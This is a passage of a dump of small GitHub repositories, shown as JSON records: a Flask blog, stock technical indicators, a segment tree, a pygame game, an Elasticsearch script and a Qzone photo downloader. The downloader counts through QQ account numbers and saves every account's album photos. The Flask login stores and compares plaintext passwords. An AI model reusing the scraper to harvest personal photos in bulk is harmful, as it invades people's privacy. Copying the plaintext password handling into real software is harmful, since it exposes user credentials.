= email\n return redirect('/newpost')\n else:\n flash('Duplicate User. 
- you must use a unique email.', 'error')\n return render_template('register.html')\n else:\n return render_template('register.html')\n\[email protected]('/login', methods=['POST', 'GET'])\ndef login():\n if request.method =='POST':\n email = request.form['email']\n password = request.form['password']\n user = User.query.filter_by(email=email).first()\n if user==None:\n flash('Login Errror - Invalid or Unregistered email address', 'error')\n return render_template('/login.html', email=email)\n if user.password != password:\n flash('Login Errror - Password Incorrect', 'error')\n return render_template('/login.html', email=email)\n if user and user.password == password:\n session['email'] = email\n flash('Logged In', 'normal')\n return redirect('/newpost')\n return render_template('login.html')\n\[email protected]('/logout')\ndef logout():\n del session['email']\n flash('You have been logged out', 'normal')\n return redirect('/login')\n\[email protected]('/')\[email protected]('/index/')\ndef index():\n return redirect ('/blog')\n\[email protected]('/home/')\ndef home():\n #sort by email, convert to username in html.\n authors = User.query.order_by(User.email).all()\n return render_template('home.html', authors=authors)\n\[email protected]('/blog/', methods=['POST', 'GET'])\ndef show_all_blog_posts():\n allPosts = db.session.query(Blog).order_by(Blog.id.desc()).all()\n return render_template('blogposts.html',title=\"My Fantastic Blog\", posts=allPosts)\n\[email protected]('/post/<int:post_id>/')\ndef show_post(post_id):\n onePost = Blog.query.filter_by(id=post_id).first()\n #validate post id is valid using query results\n # this fixes nav buttons out of range \n if onePost == None:\n return redirect ('/blog')\n return render_template('post.html', posts=onePost, post_id=post_id)\n\[email protected]('/singleUser/<int:user_id>/')\ndef show_users_posts(user_id):\n # validates user_id is in valid range\n if User.query.filter_by(id=user_id).first() == None:\n return redirect ('/blog')\n user_name = User.query.filter(User.id==user_id).first().email.split(sep='@')[0]\n user_Posts = Blog.query.order_by(Blog.id.desc()).filter(Blog.owner_id==user_id).all()\n return render_template('singleUser.html', posts=user_Posts, user_name=user_name)\n\[email protected]('/singleUser/')\ndef show_my_posts():\n user_id = User.query.filter_by(email=session['email']).first()\n return redirect('/singleUser/%s' % user_id.id)\n\[email protected]('/newpost/', methods=['POST', 'GET'])\ndef new_user_post():\n if request.method == 'POST':\n post_title = request.form['title']\n post_body = request.form['body']\n post_owner = User.query.filter_by(email=session['email']).first()\n\n # input validation\n if len(post_title) < 1 or len(post_title) > 120:\n flash('You forgot to enter a title.', 'error')\n return render_template('newpost.html', post_body=post_body)\n if len(post_body) < 1 or len(post_body) > 520:\n flash('You forgot to enter the body.', 'error')\n return render_template('newpost.html', post_title=post_title)\n\n new_post = Blog(post_title, post_body, post_owner)\n db.session.add(new_post)\n db.session.commit()\n new_post_id = new_post.id\n flash('Your new post has been posted.', 'normal')\n return redirect('/post/%s' % new_post_id)\n else:\n return render_template('newpost.html')\n\nif __name__ == '__main__':\n app.run()\n"
}
] | 2 |
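blogz above stores passwords in plain text and compares them with ==. One common hardening — sketched here with werkzeug, which ships with Flask, and not part of the original app — is to persist only a salted hash:

from werkzeug.security import generate_password_hash, check_password_hash

stored = generate_password_hash("password")      # store this, not the password
print(check_password_hash(stored, "password"))   # True
print(check_password_hash(stored, "guess"))      # False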
SALBERINO/indicadores_tecnicos | https://github.com/SALBERINO/indicadores_tecnicos | 964b10a42acf4034cd38ef9321ad63943eed2503 | 076121e1925cbf7c7b9a0dc0528e88adeb80a504 | 1196a4a9751dd294d2ab89f73449629fc308c12d | refs/heads/main | 2023-07-05T06:02:31.308778 | 2021-09-05T01:07:18 | 2021-09-05T01:07:18 | 402,904,284 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.6390390396118164,
"alphanum_fraction": 0.6450450420379639,
"avg_line_length": 40.625,
"blob_id": "056c8d2767008c67209d8ab30cc28c849c618c81",
"content_id": "04bafdf551e52ab4d1da30fc3c22335817124f1e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1665,
"license_type": "no_license",
"max_line_length": 286,
"num_lines": 40,
"path": "/indicadores.py",
"repo_name": "SALBERINO/indicadores_tecnicos",
"src_encoding": "UTF-8",
"text": "def devolver_con_percentil(data):\n \"\"\" \n Esta funcion recibe una matriz de datos, que posee la serie historica con los valores encolumnados por\n Open, High, Low, Close\n \"\"\"\n df = data . copy()\n df[\"variacion\"] = df[\"Close\"].pct_change() * 100 \n df.dropna(inplace=True)\n df[\"rank_variacion\"] = df[\"variacion\"].rank()\n df[\"rank_variacion_pct\"] = df[\"variacion\"].rank(pct= True)\n return df\n\ndef indicador_gap_basico(data):\n \"\"\" \n Esta funcion recibe una matriz de datos, que posee la serie historica con los valores encolumnados por\n Open, High, Low, Close\n \"\"\"\n import numpy as np\n df = data.copy()\n df_menosuno = data.copy().shift(1)\n df_menosdos = data.copy().shift(2)\n df_menosuno['tendencia'] = np.where(df_menosuno['Close'] > df_menosdos['Close'],'alsista','bajista')\n df['gap'] = np.where((df_menosuno['tendencia'] == 'alsista') & (df['Open'] > df_menosuno['High']) & (df['Close'] > df['Open']), 'gap alsista', np.where((df_menosuno['tendencia'] == 'bajista)') & (df['Open'] < df_menosuno['Low']) & (df['Close'] < df['Open']),'gap bajista', 'sin gap'))\n return df\n\ndef indicador_tipo_de_vela(data):\n import numpy as np\n \"\"\" \n Esta funcion recibe una matriz de datos, que posee la serie historica con los valores encolumnados por\n Open, High, Low, Close\n \"\"\"\n df = data . copy()\n df[\"vela\"] = np.where(df.Open < df.Close, \"verde\", np.where(df.Open == df.Close, \"doji\", \"roja\"))\n return df\n\ndef devolver_top_n_variacion(data, n=10, es_de_baja=True):\n df = data . copy() \n df[\"variacion\"] = df[\"Close\"].pct_change() * 100 \n df.dropna(inplace=True)\n return df.sort_values(\"variacion\", ascending = es_de_baja ).head(n)\n"
},
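devolver_con_percentil above combines pct_change with rank(pct=True) to place each day's return on its historical percentile. A self-contained toy run of the same two calls (the closing prices are invented):

import pandas as pd

df = pd.DataFrame({"Close": [10.0, 10.5, 10.2, 11.0, 10.9]})
df["variacion"] = df["Close"].pct_change() * 100   # daily return in percent
df = df.dropna()                                   # drop the first, undefined row
df["rank_variacion_pct"] = df["variacion"].rank(pct=True)
print(df)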
{
"alpha_fraction": 0.7535211443901062,
"alphanum_fraction": 0.7605633735656738,
"avg_line_length": 140,
"blob_id": "a64db0039866e218bd9d2304165d70b138323768",
"content_id": "deb77a6109c81aec7ec0699644741adadbc156c5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 143,
"license_type": "no_license",
"max_line_length": 140,
"num_lines": 1,
"path": "/README.md",
"repo_name": "SALBERINO/indicadores_tecnicos",
"src_encoding": "UTF-8",
"text": "Estos indicadores trabajan sobre un dataframe de valores de 1 ticker con los atributos 'Open', 'Close', 'Low' y 'High' en función del tiempo \n"
}
] | 2 |
hdspook/coding | https://github.com/hdspook/coding | 67c44b8a265555207cd89d93376268cf39ed749b | bd7ee7a9d07a8554e056817b4078911b30399d24 | 5291bdc58f2d2a048868875516be885b6613a837 | refs/heads/master | 2020-06-10T15:32:22.812099 | 2019-06-25T08:07:15 | 2019-06-25T08:07:15 | 193,663,176 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.4546762704849243,
"alphanum_fraction": 0.4784172773361206,
"avg_line_length": 27.26530647277832,
"blob_id": "7ea70bf5575dc0aae5ded1d39940b6943c41687d",
"content_id": "4019b64073edc2b6030e1ab1da921ff6f6e9bfc3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2780,
"license_type": "no_license",
"max_line_length": 148,
"num_lines": 98,
"path": "/SegmentTree.py",
"repo_name": "hdspook/coding",
"src_encoding": "UTF-8",
"text": "from math import ceil,log\nINF = 10**5+1\n\nclass SegmentTree:\n global INF\n \n def __init__(self,size,A):\n self.A = A\n self.n = len(A)-1\n self.segt = [0 for _ in range(size)]\n self.lazyt = [0 for _ in range(size)]\n \n def construct(self):\n self.conHelp(self.A,0,self.n,0,self.segt)\n \n def conHelp(self,A,low,high,start,st):\n if low == high:\n st[start] = A[low]\n return A[low]\n \n mid = int((low+high)/2)\n \n st[start] = min(self.conHelp(A,low,mid,2*start+1,st),self.conHelp(A,mid+1,high,2*start+2,st))\n return st[start]\n \n def RMQ(self,start,end):\n return self.RMQuery(self.segt,0,self.n,start,end,0,self.lazyt)\n \n def RMQuery(self,segt,low,high,start,end,node,lazyt):\n \n if low > high:\n return\n \n if lazyt[node] != 0:\n segt[node] += lazyt[node]\n if low != high:\n lazyt[2*node + 1] += lazyt[node]\n lazyt[2*node + 2] += lazyt[node]\n lazyt[node] = 0\n \n if start > high or end < low:\n return INF\n \n if start <= low and end >= high:\n return segt[node]\n \n mid = int((low+high)/2)\n \n return min(self.RMQuery(segt, low, mid, start, end, 2 * node + 1, lazyt),self.RMQuery(segt, mid + 1, high, start, end, 2 * node + 2, lazyt))\n \n def lazyUpdate(self,start,end,val):\n self.lazyHelper(self.segt,self.lazyt,0,self.n,start,end,0,val)\n \n def lazyHelper(self,segt,lazyt,low,high,start,end,node,val):\n \n if low > high:\n return\n \n if lazyt[node] != 0:\n segt[node] += lazyt[node]\n if low != high:\n lazyt[2*node + 1] += lazyt[node]\n lazyt[2*node + 2] += lazyt[node]\n lazyt[node] = 0\n \n if start > high or end < low:\n return INF\n \n if start <= low and end >= high:\n segt[node] += val\n if low != high:\n lazyt[2*node + 1] += val\n lazyt[2*node + 2] += val\n return\n \n mid = int((low+high)/2)\n self.lazyHelper(segt,lazyt,low,mid,start,end,2*node+1,val)\n self.lazyHelper(segt,lazyt,mid+1,high,start,end,2*node+2,val)\n segt[node] = min(segt[2*node + 1],segt[2*node + 2])\n \n def check(self):\n print(self.segt)\n print(self.lazyt)\n \n\ndef main():\n A = [1,2,3,4,5,6]\n n = len(A)\n height = int(ceil(log(n,2)))\n size = 2*2**height - 1\n s = SegmentTree(size,A)\n s.construct()\n s.lazyUpdate(1,4,5)\n s.check()\n print(s.RMQ(1,4))\n \n \nmain()\n \n \n"
}
] | 1 |
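SegmentTree.py above sizes its array-backed tree as 2 * 2**ceil(log2(n)) - 1 — the smallest perfect binary tree with at least n leaves — and pairs it with a lazy array so a range add touches only O(log n) nodes, pushing pending additions one level down when a later query or update visits them. The sizing arithmetic on its own:

from math import ceil, log2

def tree_size(n):
    # Array length for a segment tree over n elements: a perfect
    # binary tree with 2**height leaves has 2 * 2**height - 1 nodes.
    height = ceil(log2(n))
    return 2 * 2 ** height - 1

for n in (1, 6, 8, 1000):
    print(n, tree_size(n))  # 6 elements -> 15 nodes, matching main() above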
heibai01/Qzone_Photo | https://github.com/heibai01/Qzone_Photo | 77c6619f7a097d3714c0e1967cd501b38aa34fb1 | 248ef872270d1dcd2b13659388bdaee6cbcf6552 | 3184599acf1921ea1608283f73b88a486020d7a7 | refs/heads/master | 2021-01-15T17:07:37.854732 | 2016-02-11T07:53:58 | 2016-02-11T07:53:58 | null | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.5220588445663452,
"alphanum_fraction": 0.5735294222831726,
"avg_line_length": 12.699999809265137,
"blob_id": "f1ccdf85ff6ee40e0acf630c4886ba12c3a12f9f",
"content_id": "004e2da0f80f7855d8a8b14e80bcf9c139f93498",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 136,
"license_type": "permissive",
"max_line_length": 30,
"num_lines": 10,
"path": "/main.py",
"repo_name": "heibai01/Qzone_Photo",
"src_encoding": "UTF-8",
"text": "# -*- coding:utf-8 -*-\n__author__ = 'young'\n\nimport untils\n\nqq = 10000\nwhile True:\n untils.savePhotos(str(qq))\n #break\n qq += 1"
},
{
"alpha_fraction": 0.5710923075675964,
"alphanum_fraction": 0.5814501047134399,
"avg_line_length": 30.25,
"blob_id": "280401d655f49a89c2b0ba89cfa1eab9a1312636",
"content_id": "246af03d49bfddc258cde3372caedbcec905faf6",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2190,
"license_type": "permissive",
"max_line_length": 83,
"num_lines": 68,
"path": "/untils.py",
"repo_name": "heibai01/Qzone_Photo",
"src_encoding": "UTF-8",
"text": "# -*- coding:utf-8 -*-\n__author__ = 'young'\n\nimport json\nimport urllib2\nimport os\n\nimport Entity\n\n\ndef getAblums(qq, url):\n ablums = list()\n print url + qq + \"&outstyle=2\"\n request = urllib2.Request(url + qq + \"&outstyle=2\")\n f = urllib2.urlopen(request, timeout=10)\n response = f.read().decode('gbk')\n f.close()\n response = response.replace('_Callback(', '')\n response = response.replace(');', '')\n #print response\n if 'album' in json.loads(response):\n for i in json.loads(response)['album']:\n ablums.append(Entity.Album(i['id'], i['name'], i['total']))\n return ablums\n\n\ndef getPhotosByAlum(album, qq, url):\n photos = list()\n print url + qq + \"&albumid=\" + album.ID + \"&outstyle=json\"\n request = urllib2.Request(url + qq + \"&albumid=\" + album.ID + \"&outstyle=json\")\n f = urllib2.urlopen(request, timeout=10)\n response = f.read().decode('gbk')\n f.close()\n response = response.replace('_Callback(', '')\n response = response.replace(');', '')\n #print response\n if 'pic' in json.loads(response):\n for i in json.loads(response)['pic']:\n photos.append(Entity.Photo(i['url'], i['name'], album))\n return photos\n\n\ndef saveImage(path, photo, qq, index):\n print index, photo.URL\n url = photo.URL.replace('\\\\', '')\n f = urllib2.urlopen(url, timeout=10)\n data = f.read()\n f.close()\n if not os.path.exists(path+os.path.sep+qq):\n os.mkdir(path+os.path.sep+qq)\n with open(path+os.path.sep+qq+os.path.sep + index + '.jpeg', \"wb\") as code:\n code.write(data)\n code.close()\n\n\ndef savePhotos(qq, path=Entity.savepath):\n print u'获取:'+qq+u'的相册信息'\n ablums = getAblums(qq, Entity.albumbase1)\n if len(ablums) > 0:\n for i, a in enumerate(ablums):\n if a.Count > 0:\n print u'开始下载第'+str(i+1)+u'个相册'\n photos = getPhotosByAlum(a, qq, Entity.photobase1)\n for index, p in enumerate(photos):\n saveImage(path, p, qq, str(i)+'_'+str(index))\n print u'第'+str(i+1)+u'个相册下载完成'\n else:\n print u'读取到得相册个数为0'"
}
] | 2 |
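Both fetch helpers in untils.py receive JSONP — a JSON body wrapped in _Callback(...); — and strip the wrapper before calling json.loads. That unwrap step in isolation, mirroring the record's two replace calls:

import json

def unwrap_jsonp(payload):
    # Qzone's old photo API returned '_Callback({...});'; dropping the
    # prefix and the ');' suffix leaves plain JSON, as untils.py does.
    return json.loads(payload.replace('_Callback(', '').replace(');', ''))

print(unwrap_jsonp('_Callback({"album": []});'))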
Shiv359/InsertionSort | https://github.com/Shiv359/InsertionSort | 3c615e3133d9f2f9bc36f6b2d4b068494bf23913 | 0b03254e6248d76e6fca389b19329ba4aae3f780 | 08bca3ebf53e6fd3e079189c481aa62c60d6e58c | refs/heads/main | 2023-02-10T10:02:58.105354 | 2021-01-07T15:57:26 | 2021-01-07T15:57:26 | 327,658,624 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.5245283246040344,
"alphanum_fraction": 0.6188679337501526,
"avg_line_length": 22.272727966308594,
"blob_id": "439543d109341475170e4b0cf74a9fb2a98c1680",
"content_id": "c999ce7f7d5ae75a4caab4b4ed8c1431834f385f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 265,
"license_type": "no_license",
"max_line_length": 47,
"num_lines": 11,
"path": "/InsertionSort.py",
"repo_name": "Shiv359/InsertionSort",
"src_encoding": "UTF-8",
"text": "def Insertion_Sort(list1):\r\n\tfor i in range(1,len(list1)):\r\n\t\tvalue=list1[i]\r\n\t\tj=i-1\r\n\t\twhile j>=0 and value<list1[j]:\r\n\t\t\tlist1[j+1]=list1[j]\r\n\t\t\tj=j-1\r\n\t\t\tlist1[j+1]=value\r\n\treturn list1\r\nlist2=[10,5,13,8,2, 0,-1]\r\nprint('Sorted list is: ',Insertion_Sort(list2))"
}
] | 1 |
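InsertionSort.py above keeps the write of the saved value inside the inner while loop, so the key is re-written on every shift; the output is still sorted, but the textbook form shifts first and writes the key exactly once after the loop ends:

def insertion_sort(items):
    for i in range(1, len(items)):
        key = items[i]
        j = i - 1
        while j >= 0 and key < items[j]:
            items[j + 1] = items[j]   # shift larger elements one slot right
            j -= 1
        items[j + 1] = key            # single write once the slot is found
    return items

print(insertion_sort([10, 5, 13, 8, 2, 0, -1]))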
lakshaygpt28/Go4Hack | https://github.com/lakshaygpt28/Go4Hack | 2ec5e116b7f0688e69fd55b4b680ca719429008c | dea629e7f6faa83f828c6d548dba794e46ad6d0b | 15e80efeed03c81fe9a22d60d83374e4024f6f9e | refs/heads/master | 2021-05-08T14:04:06.206815 | 2018-02-04T11:20:24 | 2018-02-04T11:20:24 | 120,065,580 | 0 | 1 | null | 2018-02-03T06:23:33 | 2018-02-03T06:23:34 | 2018-10-06T09:57:05 | Python | [
{
"alpha_fraction": 0.7027027010917664,
"alphanum_fraction": 0.7432432174682617,
"avg_line_length": 23.66666603088379,
"blob_id": "66d5c0ee065cc4575095778804a428ee0611c8d7",
"content_id": "d7411edb09dbb81ff33094331a3c93e8db7ffd60",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 74,
"license_type": "no_license",
"max_line_length": 46,
"num_lines": 3,
"path": "/README.md",
"repo_name": "lakshaygpt28/Go4Hack",
"src_encoding": "UTF-8",
"text": "# Go4Hack\n# Save The World\nA game made during Hack 2.0 conducted at NITH.\n"
},
{
"alpha_fraction": 0.5673440098762512,
"alphanum_fraction": 0.5855062007904053,
"avg_line_length": 32.5,
"blob_id": "1425fc4c24e0f3f35f7c2bea4e538002cba01ff9",
"content_id": "b8e3e6d644c5de32b10cb759105371ce8d3f0dfe",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 11122,
"license_type": "no_license",
"max_line_length": 157,
"num_lines": 332,
"path": "/Save the world.py",
"repo_name": "lakshaygpt28/Go4Hack",
"src_encoding": "UTF-8",
"text": "import pygame, time, random, sys\nfrom pygame.locals import *\n\ndisplay_height, display_width = 600, 1000\nRESOLUTION = (display_width, display_height)\nBLACK = (0, 0, 0)\nWHITE = (255,255,255)\nLAWNGREEN = (124,252,0)\nCHARTREUSE = (127,255,0)\nLIMEGREEN = (50,205,50)\n\n\nBGCOLOR = BLACK #Background color\nHIGHSCORE = 0\nball_image= pygame.image.load('images/fireball.png')\n\n\ndef load_image(name):\n return pygame.image.load(name)\n\nclass flames:\n def __init__(self):\n self.image1 = load_image(\"images/flame1.png\")\n self.image2 = load_image(\"images/flame2.png\")\n self.width, self.height = 120, 720\n self.position1 = (0, 50)\n self.position2 = (display_width - self.width, 50)\n\n def display(self):\n DISPLAYSURF.blit(self.image1, self.position1)\n DISPLAYSURF.blit(self.image2, self.position2)\n\nclass plane:\n global HEALTH ,count\n def __init__(self):\n self.image = pygame.image.load(\"images/ship.png\")\n self.width = 70\n self.height = 80\n def text_objects(self,text,font):\n textSurface = font.render(text, True, WHITE)\n return textSurface, textSurface.get_rect()\n\n def message_display(self,text):\n largeText = pygame.font.Font(\"freesansbold.ttf\",100)\n textSurf,textRect = self.text_objects(text,largeText)\n textRect.center = ((display_width/2),(display_height/2))\n DISPLAYSURF.blit(textSurf,textRect)\n #if text==\"GAME OVER\":\n\n pygame.display.update()\n\n\n\n # game starts again after health is 0\n if HEALTH <= 0:\n textSurf,textRect = self.text_objects(\"Score: \"+ str(count),largeText)\n textRect.center = ((display_width/2),(display_height/2 + textRect.height))\n DISPLAYSURF.blit(textSurf,textRect)\n pygame.display.update()\n\n time.sleep(2)\n main()\n time.sleep(2)\n game_loop()\n\n def crash(self) :\n global HEALTH\n HEALTH -= 1\n crashSound = pygame.mixer.Sound('sounds/explodedeath.wav')\n crashSound.play()\n if HEALTH <= 0:\n self.message_display(\"GAME OVER\")\n\n\n self.message_display(\"YOU CRASHED!\")\n\n\n def planeRender (self,x,y):\n DISPLAYSURF.blit(self.image,(x,y))\n\nclass fireball:\n def __init__(self,velocity):\n self.image = load_image(\"images/meteor.png\")\n self.width, self.height = 35, 45\n self.position_y = -self.height\n self.position_x = random.randint(50, display_width - self.width - 50)\n self.velocity = velocity\n self.add = 3\n\n def update_position(self):\n \"\"\"\n Updates the position of fireballs from downside of screen to top of screen\n \"\"\"\n self.position_y = -self.height\n self.position_x = random.randint(50, display_width - self.width - 50)\n\n def move(self):\n \"\"\"\n Moves the fireballs downwards\n \"\"\"\n self.position_y += self.velocity\n\n def display(self):\n DISPLAYSURF.blit(self.image, (self.position_x, self.position_y))\n\n def change_speed(self):\n self.velocity += self.add\n\ndef create_fireballs(count,velocity):\n \"\"\"\n Returns a list of 4 fireballs\n \"\"\"\n fireballs = []\n for i in range(count):\n fireballs.append(fireball(velocity))\n fireballs[i].position_y -= (i+1) * (display_height / count)\n\n return fireballs\ndef score(count):\n font = pygame.font.Font(\"freesansbold.ttf\",40)\n text = font.render(\"Score: \" + str(count),True ,WHITE)\n DISPLAYSURF.blit(text,(0,0))\ndef LEVEL(game_level):\n font = pygame.font.Font(\"freesansbold.ttf\",40)\n text = font.render(\"Level: \" + str(game_level),True ,WHITE)\n DISPLAYSURF.blit(text,(400,0))\ndef highscore(HIGHSCORE):\n font = pygame.font.Font(\"freesansbold.ttf\",40)\n text = font.render(\"Highscore: \" + str(HIGHSCORE),True ,WHITE)\n 
DISPLAYSURF.blit(text,(700,0))\n'''def firewall():\n wall_image = pygame.image.load('images/flames.png')\n DISPLAYSURF.blit(wall_image,(display_width-100,0))'''\ndef game_loop():\n global HEALTH,count ,HIGHSCORE\n Healthimg = pygame.image.load(\"images/healthimg.png\")\n FIREBALLSCOUNT = 4\n FIREBALLVELOCITY = 5\n fireballs = create_fireballs(FIREBALLSCOUNT,FIREBALLVELOCITY)\n jet = plane()\n x = display_width/2 - jet.width/2\n y = display_height - jet.height -50\n xchange = 0\n game_level = 1\n pygame.mixer.music.load('sounds/game.mp3')\n pygame.mixer.music.play(-1,0.0)\n while True:\n DISPLAYSURF.fill(BLACK)\n firewall = flames()\n #DISPLAYSURF.blit(firewall.image,firewall.position)\n firewall.display()\n score(count)\n highscore(HIGHSCORE)\n for i in range(HEALTH):\n DISPLAYSURF.blit(Healthimg,(200 + (i*45),(0)))\n #LEVEL(game_level)\n for event in pygame.event.get():\n if event.type == QUIT:\n pygame.quit()\n quit()\n\n if event.type == pygame.KEYDOWN:\n if event.key == K_SPACE:\n pauseGame()\n if event.key == pygame.K_LEFT :\n xchange = -10\n\n if event.key == pygame.K_RIGHT:\n xchange = 10\n if event.key == K_ESCAPE:\n terminate()\n\n if event.type == pygame.KEYUP:\n if event.key == pygame.K_LEFT or event.key == pygame.K_RIGHT:\n xchange = 0\n x = x + xchange\n for i in range(FIREBALLSCOUNT):\n fireballs[i].move()\n\n if fireballs[i].position_y >= display_height:\n #vanishSound = pygame.mixer.Sound('sounds/missile.wav')\n #vanishSound.play()\n fireballs[i].update_position()\n #fireball_near = (fireball_near + 1) % 4\n #score(count)\n count +=1\n #score(count)\n if count > HIGHSCORE:\n HIGHSCORE = count\n if (count-1) % 20 == 0 and count != 1:\n game_level += 1\n\n largeText = pygame.font.Font(\"freesansbold.ttf\",100)\n textSurf,textRect = jet.text_objects(\"Level: \"+ str(game_level),largeText)\n textRect.center = ((display_width/2),(display_height/2 ))\n DISPLAYSURF.blit(textSurf,textRect)\n #score(count)\n #highscore(HIGHSCORE)\n pygame.display.update()\n\n levelSound = pygame.mixer.Sound('sounds/healthup.wav')\n levelSound.play()\n time.sleep(2)\n\n for i in range(4):\n fireballs[i].change_speed()\n #score(count)\n\n # Only display below score and health bar\n if fireballs[i].position_y > 40:\n DISPLAYSURF.blit(fireballs[i].image, (fireballs[i].position_x, fireballs[i].position_y))\n LEVEL(game_level)\n firewall.display()\n jet.planeRender(x,y)\n if x < 50 or x > display_width - jet.width -50:\n pygame.mixer.music.stop()\n jet.crash()\n\n for i in range(4):\n if fireballs[i].position_y + fireballs[i].height > y and fireballs[i].position_y < y + jet.height :\n if not (x >= fireballs[i].position_x + fireballs[i].width or x + jet.width <= fireballs[i].position_x ) :\n pygame.mixer.music.stop()\n jet.crash()\n #if (x + jet.width >= fireballs[i].position_x + 25 and x + jet.width <= fireballs[i].position_x + fireballs[i].width - 25):\n pygame.display.update()\n FPSCLOCK.tick(FPS)\n\n\n# main game loop\n# anything after the game has started is written inside this loop\ndef main():\n global DISPLAYSURF, FPSCLOCK, IMAGESDICT, BASICFONT, FPS, HEALTH,count,HIGHSCORE\n\n pygame.init()\n FPSCLOCK = pygame.time.Clock()\n FPS = 60\n HEALTH = 3\n count = 0\n DISPLAYSURF = pygame.display.set_mode(RESOLUTION)\n\n pygame.display.set_caption(\"Save The World!\")\n BASICFONT = pygame.font.Font(\"freesansbold.ttf\",22)\n\n IMAGESDICT = {'title':pygame.image.load('images/title_image.png')}\n\n startScreen()\n game_loop()\n terminate()\n\ndef startScreen():\n bgimage = 
pygame.image.load('images/bgi.jpg')\n bgimage = pygame.transform.scale(bgimage,RESOLUTION)\n FIREBALLSCOUNT = 7 # number of fireballs displayed on start screen\n INSTRUCTIONS = [\"Press ESC to quit at any time\",\"Press SPACE to pause\",\"Press any other key to continue...\",\"Tip : Dodge the meteors to increase score\"]\n fontObj = pygame.font.Font(\"freesansbold.ttf\",80)\n titleText = fontObj.render(\"Save the World\",True,(219, 50, 54))\n titleRect = titleText.get_rect()\n# titleRect = IMAGESDICT['title'].get_rect()\n topCoord = RESOLUTION[1]//2 - titleRect.height-50\n titleRect.top = topCoord\n titleRect.centerx = RESOLUTION[0]//2\n topCoord+=titleRect.height + 20\n displayText = []\n displayTextPos = []\n for i in range(len(INSTRUCTIONS)):\n\n displayText.append(BASICFONT.render(INSTRUCTIONS[i],True,BLACK))\n displayTextPos.append(displayText[i].get_rect())\n displayTextPos[i].center = (RESOLUTION[0]//2,topCoord)\n topCoord+=displayTextPos[i].height\n# DISPLAYSURF.blit(IMAGESDICT['title'],titleRect)\n\n # theme music\n pygame.mixer.music.load('sounds/theme.mp3')\n pygame.mixer.music.play(-1,0.0)\n\n fireballs = create_fireballs(FIREBALLSCOUNT,2)\n while True: #Main loop for the start screen\n DISPLAYSURF.fill(BGCOLOR)\n DISPLAYSURF.blit(bgimage,bgimage.get_rect())\n\n for i in range(FIREBALLSCOUNT):\n fireballs[i].move()\n\n if fireballs[i].position_y >= display_height:\n fireballs[i].update_position()\n\n DISPLAYSURF.blit(fireballs[i].image, (fireballs[i].position_x, fireballs[i].position_y))\n\n DISPLAYSURF.blit(titleText,titleRect)\n\n for i in range(len(displayText)):\n DISPLAYSURF.blit(displayText[i],displayTextPos[i])\n\n for event in pygame.event.get():\n if event.type == QUIT:\n terminate()\n elif event.type == KEYDOWN:\n if event.key == K_ESCAPE:\n terminate()\n pygame.mixer.music.stop()\n return\n\n pygame.display.update()\n FPSCLOCK.tick(FPS)\n\ndef pauseGame():\n LARGEFONT = pygame.font.Font(\"freesansbold.ttf\",100)\n pauseText = LARGEFONT.render(\"PAUSED\",True,WHITE)\n\n textRect = pauseText.get_rect()\n textRect.center = (RESOLUTION[0]//2,RESOLUTION[1]//2)\n\n DISPLAYSURF.blit(pauseText,textRect)\n pygame.display.update()\n\n while True:\n for event in pygame.event.get():\n if event.type == QUIT:\n terminate()\n elif event.type == KEYDOWN:\n if event.key == K_ESCAPE:\n terminate()\n elif event.key == K_SPACE:\n return\n\ndef terminate():\n pygame.quit()\n sys.exit()\n\nif __name__ == '__main__':\n main()\n"
}
] | 2 |
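The crash test in `Save the world.py` above is an axis-aligned bounding-box check written as two interval tests, one per axis. A minimal sketch of the same idea factored into a reusable function — the 70x80 plane and 35x45 fireball sizes come from the entry, while the positions are illustrative:

```python
def intervals_overlap(a_start, a_len, b_start, b_len):
    # Two 1-D intervals overlap unless one ends before the other begins.
    return not (a_start >= b_start + b_len or a_start + a_len <= b_start)

def boxes_collide(ax, ay, aw, ah, bx, by, bw, bh):
    # Axis-aligned boxes collide only if they overlap on both axes.
    return intervals_overlap(ax, aw, bx, bw) and intervals_overlap(ay, ah, by, bh)

# Plane of size 70x80 at (100, 470) versus a 35x45 fireball at (110, 500).
print(boxes_collide(100, 470, 70, 80, 110, 500, 35, 45))  # True
```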
ravvas/Pyelastic | https://github.com/ravvas/Pyelastic | f9facf9f159945d70d4651396b03e36798b61b0f | a0080ccb41539245a381427689a784b720fbc040 | daed0596ac679281db036c3c0227b4407c06fdd9 | refs/heads/master | 2016-09-14T19:28:00.715310 | 2016-04-21T09:01:31 | 2016-04-21T09:01:31 | 56,522,308 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.5684523582458496,
"alphanum_fraction": 0.6041666865348816,
"avg_line_length": 37.25,
"blob_id": "08b9f14b557f9bd1f7082d739aacfa0654888322",
"content_id": "9d56b15042b097ef16e6e7e2d5ba5014f7091142",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 336,
"license_type": "no_license",
"max_line_length": 91,
"num_lines": 8,
"path": "/elastictypecount.py",
"repo_name": "ravvas/Pyelastic",
"src_encoding": "UTF-8",
"text": "from elasticsearch.client import Elasticsearch\r\nhost = \"10.9.238.35\"\r\nport = \"9200\"\r\nes = Elasticsearch(host=host, port=port)\r\nres = es.indices.get_mapping()\r\nfor index in res :\r\n for type in res[index][\"mappings\"] :\r\n print index + \",\" + type + \",\" + str(es.count(index=index,doc_type=type)[\"count\"])\r\n \r\n \r\n\r\n"
},
{
"alpha_fraction": 0.7708333134651184,
"alphanum_fraction": 0.7766203880310059,
"avg_line_length": 56.266666412353516,
"blob_id": "6084632bb6d3fd4fd95529e62a7414fc6f782bc8",
"content_id": "16cedef126ea0c8aa2649fec6290b826530a9c1c",
"detected_licenses": [],
"is_generated": false,
